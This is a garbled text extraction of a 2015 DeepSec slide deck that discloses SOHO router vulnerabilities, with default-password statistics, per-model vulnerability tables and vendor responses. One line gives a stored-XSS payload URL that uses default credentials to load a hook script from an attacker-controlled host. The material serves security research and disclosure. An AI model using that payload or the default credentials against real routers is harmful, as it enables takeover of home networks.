Revisiting SOHO Router Attacks
DeepSec 2015
Revisiting SOHO Router Attacks DeepSec 2015 About us.. ... Meet - - PowerPoint PPT Presentation
Revisiting SOHO Router Attacks DeepSec 2015 About us.. ... Meet our research group lvaro Folgado Rueda Independent Researcher Jos Antonio Rodrguez Garca Independent Researcher Ivn Sanz de Castro Security Analyst at Wise Security
DeepSec 2015
Revisiting SOHO Router Attacks · DeepSec 2015
2
Álvaro Folgado Rueda
Independent Researcher
José Antonio Rodríguez García
Independent Researcher
Iván Sanz de Castro
Security Analyst at Wise Security Global.
Revisiting SOHO Router Attacks · DeepSec 2015
3
Search for vulnerability issues Explore innovative attack vectors Develop exploiting tools Build an audit methodology
Evaluate the current security level of routers
Revisiting SOHO Router Attacks · DeepSec 2015
4
Revisiting SOHO Router Attacks · DeepSec 2015
4
Revisiting SOHO Router Attacks · DeepSec 2015
4
Revisiting SOHO Router Attacks · DeepSec 2015
4
Revisiting SOHO Router Attacks · DeepSec 2015
4
Revisiting SOHO Router Attacks · DeepSec 2015
4
Revisiting SOHO Router Attacks · DeepSec 2015
5
Revisiting SOHO Router Attacks · DeepSec 2015
6
Revisiting SOHO Router Attacks · DeepSec 2015
7
45% 27% 5% 5% 18%
Use ser / / Pas assword
1234 / 1234 admin / admin [blank] / admin admin / password vodafone / vodafone
Revisiting SOHO Router Attacks · DeepSec 2015
8
Revisiting SOHO Router Attacks · DeepSec 2015
8
Revisiting SOHO Router Attacks · DeepSec 2015
router configuration changes
9
Revisiting SOHO Router Attacks · DeepSec 2015
Request) or HTTP 401 (Unauthorized)
10
Vid ideo Demo #1
requiring authentication
Revisiting SOHO Router Attacks · DeepSec 2015
the entire router filesystem
feature
11
Revisiting SOHO Router Attacks · DeepSec 2015
the entire router filesystem
feature
11
Revisiting SOHO Router Attacks · DeepSec 2015
the contents of the USB storage device hooked up to the router
12
Revisiting SOHO Router Attacks · DeepSec 2015
the contents of the USB storage device hooked up to the router
12
Revisiting SOHO Router Attacks · DeepSec 2015
sending a specific malicious link to the victim
malicious URL
13
Revisiting SOHO Router Attacks · DeepSec 2015
sending a specific malicious link to the victim
malicious URL
13
Revisiting SOHO Router Attacks · DeepSec 2015
sending a specific malicious link to the victim
malicious URL
13
Revisiting SOHO Router Attacks · DeepSec 2015
14
Revisiting SOHO Router Attacks · DeepSec 2015
configuration interface
15
Revisiting SOHO Router Attacks · DeepSec 2015
the attacker
http://1234:1234@192.168.1.1/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script>
16
Revisiting SOHO Router Attacks · DeepSec 2015
requiring any login process
script within the hostname parameter
Clients (DHCP Leases) table
17
Revisiting SOHO Router Attacks · DeepSec 2015
18
Revisiting SOHO Router Attacks · DeepSec 2015
19
Revisiting SOHO Router Attacks · DeepSec 2015
19
Revisiting SOHO Router Attacks · DeepSec 2015
20
Revisiting SOHO Router Attacks · DeepSec 2015
privileges and become an administrator
21
Vid ideo Demo #2
Revisiting SOHO Router Attacks · DeepSec 2015
22
Revisiting SOHO Router Attacks · DeepSec 2015
22
Revisiting SOHO Router Attacks · DeepSec 2015
login process
23
Revisiting SOHO Router Attacks · DeepSec 2015
login process
23
Revisiting SOHO Router Attacks · DeepSec 2015
24
Revisiting SOHO Router Attacks · DeepSec 2015
24
Revisiting SOHO Router Attacks · DeepSec 2015
24
Revisiting SOHO Router Attacks · DeepSec 2015
configuration changes such as opening ports
25
Revisiting SOHO Router Attacks · DeepSec 2015
26
Revisiting SOHO Router Attacks · DeepSec 2015
27
Revisiting SOHO Router Attacks · DeepSec 2015
27
Revisiting SOHO Router Attacks · DeepSec 2015
28
Revisiting SOHO Router Attacks · DeepSec 2015
Ethernet cable or wirelessly
29
Revisiting SOHO Router Attacks · DeepSec 2015
30
Revisiting SOHO Router Attacks · DeepSec 2015
30
Revisiting SOHO Router Attacks · DeepSec 2015
30
Revisiting SOHO Router Attacks · DeepSec 2015
30
Revisiting SOHO Router Attacks · DeepSec 2015 31
Liv ive Demo #1
Liv ive Demo #2 #2
Revisiting SOHO Router Attacks · DeepSec 2015
32
Revisiting SOHO Router Attacks · DeepSec 2015
33
Revisiting SOHO Router Attacks · DeepSec 2015
7 3 1 No reply "Not our problem" Other
34
Revisiting SOHO Router Attacks · DeepSec 2015
34
Revisiting SOHO Router Attacks · DeepSec 2015
vulnerabilities
35
Revisiting SOHO Router Attacks · DeepSec 2015
36
Revisiting SOHO Router Attacks · DeepSec 2015
37
Revisiting SOHO Router Attacks · DeepSec 2015
37
Revisiting SOHO Router Attacks · DeepSec 2015
38
Revisiting SOHO Router Attacks · DeepSec 2015 39
2 4 6 8 10 12 14 16 18
Disc isclo losed vu vuln lnerabili litie ies per r manufacturer
Número de routers afectados Vulnerabilidades totales encontradas
Number of disclosed vulnerabilities Number of affected routers
Revisiting SOHO Router Attacks · DeepSec 2015 40
21% 15% 20%
8%
2%
3%
2%
6%
23%
XSS Unauthenticated XSS CSRF Denial of Service Privilege Escalation Information Disclosure Backdoor Bypass Authentication UPnP
Vulnerabilities by types
Revisiting SOHO Router Attacks · DeepSec 2015 41
Router
XSS Unauth. XSS CSRF DoS Privilege Escalation Info. Disclosure Backdoor Bypass Auth. UPnP Observa Telecom AW4062
Vuln.
Vuln. Vuln.
Vuln.
Comtrend CT-5365
Vuln. Vuln. Vuln.
D-Link DSL2750B
Belkin F5D7632-4
Vuln.
Sagem LiveBox Pro 2 SP
Vuln.
Amper Xavi 7968/+
Sagem F@st 1201
Vuln. Vuln. Vuln. Vuln.
Observa Telecom BHS-RTA
Observa Telecom VH4032N
Vuln.
Vuln.
Huawei HG553
Vuln.
Vuln.
Vuln.
Huawei HG556a
Vuln. Vuln. Vuln. Vuln.
Vuln.
Astoria ARV7510
Vuln. Vuln. Vuln.
Comtrend AR-5387un
Vuln. Vuln.
Vuln.
Vuln. Vuln.
Vuln.
D-Link DIR-600
Revisiting SOHO Router Attacks · DeepSec 2015
42
Revisiting SOHO Router Attacks · DeepSec 2015
42
Revisiting SOHO Router Attacks · DeepSec 2015
42
Revisiting SOHO Router Attacks · DeepSec 2015
42
Revisiting SOHO Router Attacks · DeepSec 2015
42
Revisiting SOHO Router Attacks · DeepSec 2015
42
Revisiting SOHO Router Attacks · DeepSec 2015
improved?
SOHO ROUTER SECURITY
43
Revisiting SOHO Router Attacks · DeepSec 2015
44
Revisiting SOHO Router Attacks · DeepSec 2015
44
Revisiting SOHO Router Attacks · DeepSec 2015
Álvaro Folgado Rueda · alvfolrue@gmail.com José A. Rodríguez García · joseantorodriguezg@gmail.com Iván Sanz de Castro · ivan.sanz.dcastro@gmail.com
45